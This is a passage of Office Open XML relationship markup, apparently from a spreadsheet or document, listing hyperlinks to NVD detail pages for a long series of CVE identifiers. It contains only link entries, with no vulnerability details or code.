Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89561" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89616" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89647" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89648" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89657" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89664" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89678" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89679" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89680" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89684" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89685" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89687" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89692" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89695" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89696" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89699" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89704" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89706" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89707" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54240" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54241" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79644" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86166" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89157" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89769" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15679" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57842" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78135" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84652" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89521" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17037" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18579" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47773" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74925" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81754" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81825" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82583" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87020" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54166" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62089" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78134" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78807" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80958" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81007" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81011" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89012" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89245" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89251" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89252" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89443" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89571" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89593" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89596" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89608" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89639" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89640" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89691" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89705" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89731" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90445" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90447" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90448" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85083" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89456" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89459" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11748" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13326" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45056" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48490" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50025" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84941" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87727" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89173" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89175" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89242" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89248" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89261" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89263" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90449" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90457" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15710" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83545" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83546" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85238" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85678" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86780" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89065" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21085" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21093" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21101" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21102" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21104" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89332" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11496" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15439" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49463" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50018" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54248" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54258" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62110" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62111" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62138" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66324" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78488" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80170" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81910" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85116" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85239" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86812" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87468" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87493" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87519" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87522" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87580" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87584" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87589" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87591" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87600" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87603" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87610" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87626" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89158" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89160" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54165" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6640" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6641" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6642" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7438" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77187" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79974" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18121" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49992" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54665" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81905" TargetMode="External" Id="rId663" /><Relationship 